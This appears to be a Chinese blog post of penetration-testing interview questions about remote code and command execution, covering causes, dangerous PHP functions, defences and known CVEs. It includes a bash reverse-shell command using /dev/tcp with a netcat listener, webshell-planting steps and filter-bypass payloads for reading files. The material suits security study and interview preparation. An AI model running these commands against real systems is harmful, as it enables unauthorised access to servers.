[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(十)RCE (远程代码/命令执行漏洞)相关面试题

news/2024/4/24 3:53:03/

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

渗透方向的岗位,涉及到的知识点是很广泛的。
这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞RCE (远程代码/命令执行漏洞)方向的面试题。
如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。
当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(一)SQL注入相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(二)XSS注入相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(三)CSRF相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(四)SSRF相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(五)文件上传相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(六)文件包含相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(七)逻辑漏洞相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(八)暴力破解相关面试题

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(九)XXE 相关面试题

文章目录

  • 🍬 博主介绍
  • 1、远程命令执行漏洞原理是什么?
  • 2、远程代码执行漏洞原理是什么?
  • 3、RCE漏洞有什么危害?
  • 4、RCE漏洞对你来说有什么作用?
  • 5、php能远程执行的函数有哪些?
    • 1.命令执行的函数:
    • 2.代码执行的两个函数:
  • 6、能讲一下preg_replace触发漏洞的前提吗?
  • 7、能讲一下windows系统命令拼接方式吗?
    • 1.|
    • 2.&
    • 3.||
    • 4.&&
  • 8、能讲一下RCE的防御措施吗?
  • 9、你复现过哪些RCE漏洞,你会自己搭建漏洞环境吗?
  • 10、一个站点存在RCE漏洞,如何getshell?
  • 11、一个站点RCE存在漏洞,怎么利用webshell进行连接?
  • 12、你想要查看某个文件,你发现cat被过滤了,怎么办?
    • 1.使用其他命令代替:
    • 2.使用转义符
    • 3.变量绕过
    • 4.编码进制绕过

1、远程命令执行漏洞原理是什么?

1、一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。
2、比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
3、如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。
4、现在很多的企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。在这种平台上往往会出现远程系统命令执行的漏洞。

2、远程代码执行漏洞原理是什么?

1、因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。
2、不管是使用了代码执行的函数,还是使用了不安全的反序列化等等,都可能造成远程代码执行漏洞。
3、如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。

3、RCE漏洞有什么危害?

1、获取服务器权限。
2、获取敏感数据文件。
3、写入恶意文件getshell。
4、植入木马病毒勒索软件。

4、RCE漏洞对你来说有什么作用?

我能利用RCE漏洞,向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

5、php能远程执行的函数有哪些?

1.命令执行的函数:

1. system:执行一个外部的应用程序并显示输出的结果
2. exec:执行一个外部的应用程序
3. shell_exec:执行shell命令并返回输出的结果的字符串
4. passthru:执行一个UNIX系统命令并显示原始的输出
5. popen()
6. proc_popen()

2.代码执行的两个函数:

1.eval(PHP代码)
2.assert(PHP代码)
3.preg_replace
4.call_user_func()和array_map()

6、能讲一下preg_replace触发漏洞的前提吗?

preg_replace函数第一个参数存在e修饰符时,第二个参数和第三个参数可能当作PHP代码被执行。

preg_replace漏洞触发有两个前提:
1、第一个参数需要e标识符,有了它可以执行第二个参数的命令。
2、第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令。

7、能讲一下windows系统命令拼接方式吗?

windows系统命令拼接一般我们是需要用后面的语句来进行攻击,所以首选|,如果被过滤了在考虑其他方式。有如下几种方式:

1.|

管道符,前面命令标准输出,后面命令的标准输入。直接执行后面的语句。
例如:ping 127.0.0.1|whoami直接执行whoami。

2.&

前面的语句为假则执行后面的语句。
例如:commandA & commandB 先运行命令A,然后运行命令B。

3.||

前面的语句执行出错则执行后面的语句。
例如:commandA || commandB 运行命令A,如果失败则运行命令B。

4.&&

前面的语句为假,直接出错,前面的语句为真,执行后面的语句。
例如:commandA && commandB 运行命令A,如果成功则运行命令B。

8、能讲一下RCE的防御措施吗?

1、尽量不要使用命令执行函数。
2、不要让用户控制参数。
3、执行前做好检测和过滤。

9、你复现过哪些RCE漏洞,你会自己搭建漏洞环境吗?

我复现过很多漏洞,一般使用在线复现环境或者使用vulhub漏洞环境,如果找不到漏洞环境我会自己搭建环境。

1、struts2全系列RCE漏洞。
2、solr远程命令执行CVE-2019-17558、CVE-2019-0193。
3、Log4j2远程代码执行漏洞复现cve-2021-44228。
4、Spring Framework远程代码执行漏洞CVE-2022-22965
5、Oracle WebLogic Server远程代码执行CVE-2022-21306
6、JBOSS反序列化漏洞复现CVE-2017-12149、CVE-2017-7504
......

10、一个站点存在RCE漏洞,如何getshell?

反弹shell就行了,我一般使用bash反弹shell,有时候也会用nc或者python。
举例:
本地我采用nc监听

nc -lvvp 端口

远程执行命令

bash -i >& /dev/tcp/本地监听IP/本地监听端口 0>&1

进行exec编码之后就可以远程执行了。

11、一个站点RCE存在漏洞,怎么利用webshell进行连接?

1、找到他的web路径。
2、使用touch命令在web目录创建一个webshell文件。
3、然后使用ehco命令在webshell文件里面写入webshell代码。
4、然后使用chmod命令给文件增加777权限。
5、最后采用菜刀蚁剑等webshell连接工具进行连接。

12、你想要查看某个文件,你发现cat被过滤了,怎么办?

如果只过滤了了cat,有很多绕过方式,我这里随便举几个例子。

1.使用其他命令代替:

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 taccat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /flag 2>%261  //报错出文件内容

2.使用转义符

ca\t 文件名

3.变量绕过

a=c;b=a;c=t;
$a$b$c 文件名

4.编码进制绕过

如下,先对命令进行编码或者做进制处理,然后再执行。这里我才用了base64编码。

echo 'cat' | base64
`echo 'Y2F0wqAK' | base64 -d` 文件名

http://www.ppmy.cn/news/6528.html

相关文章

做一个极简 UI 库之代码 lint

eslint, prettier, stylelint 的配置 这三个规则的配置思路:代码美化用 prettier,逻辑代码用 eslint 校验,样式代码用 stylelint 校验。有跟代码美化冲突的以 prettier 为主 为什么要用这么多呢,因为 eslint 不能解析样式代码&a…

Opencv项目实战:18 人体姿态检测

目录 0、项目介绍 1、效果展示 2、项目搭建 3、项目代码讲解与介绍 Basics.py PoseModule.py Example.py 人体姿态图​编辑 4、项目资源 5、项目总结 0、项目介绍 mediapipe中有人体姿态检测的功能,今天我们就将实现最最基础的人体姿态估计项目,它…

腾讯云Windows 轻量应用服务器如何搭建 FTP 服务?

本文档介绍如何在 Windows 操作系统的轻量应用服务器上通过 IIS 搭建 FTP 站点。 本文搭建 FTP 服务组成版本如下: Windows 操作系统,本文以系统镜像 Windows Server 2012 为例。IIS:Web 服务器,本文以 IIS 8.5 为例。 步骤1&am…

分布式理论之分布式选举

写在前面 一个国家需要领导人制定各种国家决策,一个军队也需要最高统领来制定各种军事决策,同理,一个分布式集群也需要一个领导,来协调整个集群的事务,比如保证数据一致性(这也是最重要的!),分…

JavaScript:封装单向链表10种常见的操作方法

链表的优势 1.要存储多个元素的时候,除了数组还可以选择链表。 2.与之数组不同的是,链表中的元素在内存中不必是连续的空间。 3.链表中的每个元素由一个存储元素本身的节点和一个指向下一个节点的引用(指针或者连接)组成。 相比于数组,链表有…

「PAT乙级真题解析」Basic Level 1100 校庆 (问题分析+完整步骤+伪代码描述+提交通过代码)

乙级的题目训练主要用来熟悉编程语言的语法和形成良好的编码习惯和编码规范。从小白开始逐步掌握用编程解决问题。 PAT (Basic Level) Practice 1100 校庆 问题分析 题设给定了一组校友ID, 然后给定了一组来宾ID, 要求输出是校友的来宾中, 最年长的一位。如果来宾中没有校友,…

C++11

目录1. C11简介统一的列表初始化声明auto与decltypenullptr范围for循环/智能指针STL中一些变化右值引用和移动语义左值引用和右值引用左值引用与右值引用比较右值引用使用场景和意义左值引用的使用场景:左值引用的短板:以to_string为例,了解右…

安装和配置MySQL

首先前往官网下载mysql社区版(不要钱) MySQL Community Serverhttps://dev.mysql.com/downloads/windows/installer/8.0.html 甲骨文比较鸡贼,会要求你注册一个账号。但是下面有一行小字,直接点击下载就好了 双击后直接按…

河道非法采砂识别系统 yolov5

河道非法采砂识别系统通过yolov5网络架构深度学习技术对河道非法采砂行为进行实时分析检测,如yolov5架构模型发现现场违规采砂,则立即抓拍回传后台。YOLO算法- YOLO算法是一种基于回归的算法,它不是选择图像中有趣的部分,而是预测…

从刘润的商业简史,预测互联网与能源的未来,辉煌的人生需要顺势而为

所有理所当然的现在,都是曾经看起来不可能的未来。 所有现在看起来不可想象的未来,可能都是明天理所当然的现在。 未来已来,只是尚未流行。 “一切历史都是当代史。”学习历史的目的,正是为了从中总结规律,然后用这些…

小黑实习debug中遇到了函数式编程的混乱,特此进行的日常积累:python函数积累1

函数参数中有默认值,在函数内部会创建一块区域并维护这个默认值 # 在函数内存中会维护一块区域存储 [1,2,666,666,666] 100010001 def func(a1,a2[]):a2.append(666)print(a1,a2)func(100) func(1000)100 [666] 1000 [666, 666] def func(a1,a2[]):a2.append(666…

Spring整合Activemq

目录 一、Pom.xml 二、Spring配置文件 三、队列 四、主题 一、Pom.xml <dependencies><!-- activemq核心依赖包 --><dependency><groupId>org.apache.activemq</groupId><artifactId>activemq-all</artifactId><version>…

【Django】第四课 基于Django超市订单管理系统开发

概念 本文在上一文之上&#xff0c;针对管理员&#xff0c;经理&#xff0c;普通员工身份的用户操作订单管理模块功能。 功能实现 该功能也是业务功能模块&#xff0c;管理员不具备操作权限&#xff0c;普通员工需要对超市所合作的供应商进行进货&#xff0c;因此普通员工可…

【Transformer】医学分隔领域的应用与扩展(论文阅读)(一)

声明:仅学习使用~ Transformer学习 对于一个图像来讲,为什么要先对它进行卷积CNN的操作,然后再进行Transformer呢? Transformer的计算,是跟图像当中有多少个点,位置当中有多少个点,是高度相关的。 比如是256x256个点,每个点呢,都要跟其他的点去计算关系。那这时候…

5G无线技术基础自学系列 | 5G网络速率问题分析

素材来源&#xff1a;《5G无线网络规划与优化》 一边学习一边整理内容&#xff0c;并与大家分享&#xff0c;侵权即删&#xff0c;谢谢支持&#xff01; 附上汇总贴&#xff1a;5G无线技术基础自学系列 | 汇总_COCOgsta的博客-CSDN博客 前面介绍了接入性和移动性两类问题的处…

【软件测试】从事5年资深测试的经验,少走弯路......

目录&#xff1a;导读前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结&#xff08;尾部小惊喜&#xff09;前言 小张&#xff1a; 工…

论文投稿指南——中文核心期刊推荐(自然科学总论)

【前言】 &#x1f680; 想发论文怎么办&#xff1f;手把手教你论文如何投稿&#xff01;那么&#xff0c;首先要搞懂投稿目标——论文期刊 &#x1f384; 在期刊论文的分布中&#xff0c;存在一种普遍现象&#xff1a;即对于某一特定的学科或专业来说&#xff0c;少数期刊所含…

自动控制原理笔记-二阶欠阻尼系统动态性能指标计算

目录 欠阻尼二阶系统的两种表示方法&#xff1a; 二阶欠阻尼系统单位阶跃响应&#xff1a; 二阶欠阻尼系统单位指标计算&#xff1a; 例题&#xff1a; 例题&#xff1a; 二阶系统动态性能随极点位置分布的变化规律&#xff1a; 例题&#xff1a; 欠阻尼包括零阻尼 欠阻…

Autofs按需挂载文件系统

1、Autofs简介 大部分情况下,我们都需要将挂载信息写入到/etc/fstab文件中,使其能随机器开机时自动挂载。 但是对于像Samba、NFS等远程资源,建议还是使用autofs自动挂载服务,因为如果挂载的远程资源太多,则会给网络带宽和服务器的硬件资源带来很大负载。 与mount命令不…

Kafka图解

Kafka简介 Kafka是一种消息队列,主要用来处理大量数据状态下的消息队列,一般用来做日志的处理。Kafka拥有消息队列的相应的特性: 解耦合 如果是接口的方式客户端请求服务端,服务端再响应并返回消息,消息具有一定的延迟且不说,这种通过接口的方式,耦合度很高。而利用消息…